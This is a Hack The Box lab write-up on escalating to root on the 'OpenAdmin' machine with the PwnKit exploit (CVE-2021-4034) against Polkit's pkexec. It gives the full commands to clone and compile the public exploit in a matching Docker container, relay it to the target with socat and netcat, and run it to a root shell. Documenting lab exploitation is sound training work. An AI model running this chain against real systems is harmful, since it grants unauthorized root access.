OpenAdmin_Privilege_Escalation_2

CVE-2021-4034

---

peas discovered that the target system is vulnerable to cve-2021-4034 The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit pwnkit:

---

I Found an exploit online I will download this to Kali

www-data@openadmin:/tmp$ gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.

Since the target system doesn’t have any compiler installed, I would have to compile the exploit remotely

Docker Exploit Development

---

www-data@openadmin:/opt/ona/www$ ldd --version
ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

The target system is Ubuntu 18.04.3 LTS (Bionic Beaver) and has ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27

┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ docker run -it --entrypoint "/bin/bash" --name ubuntu18.04 ubuntu:18.04                                                       

I will first create the container of ubuntu 18.04. It’s the closest to the target system

root@4e9b62310146:~# ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

First thing to do, once inside the container, is to check the GLIBC version, so that I can make sure this exploit will work on the target system

root@4e9b62310146:~# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Then, I updated the repo and installed the necessary tools

root@4e9b62310146:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034

I then grabbed the exploit package

root@4e9b62310146:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.

Compile.

root@4e9b62310146:~/CVE-2021-4034# cd .. ; tar -czvf CVE-2021-4034.tar.gz CVE-2021-4034

Archive the whole package again for delivery

┌──(kali㉿kali)-[~/…/htb/labs/openadmin/kernelbuster]
└─$ socat tcp4-listen:2222,fork tcp4:$IP:2222

On Kali, I set up a network forwarder. This will receive the archive from the container and forward it to the target system

Then I set up a listener on the target system so that it can receive the archive

root@4e9b62310146:~# nc 10.10.14.6 2222 < CVE-2021-4034.tar.gz 

Delivering the archive to the Kali network forwarder

Archive received from the target system

Exploitation

---

www-data@openadmin:/tmp$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

I opened up the archive by decompressing it and changed the working directory to the exploit package

www-data@openadmin:/tmp/CVE-2021-4034$ ./cve-2021-4034
#
# whoami
root
# hostname
openadmin
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:a730  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:a730  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:a7:30  txqueuelen 1000  (Ethernet)
        RX packets 1662864  bytes 310755350 (310.7 MB)
        RX errors 0  dropped 112  overruns 0  frame 0
        TX packets 1662119  bytes 769215981 (769.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 14608  bytes 1138920 (1.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14608  bytes 1138920 (1.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
# 

Executing the exploit resulted in a root shell System Level Compromise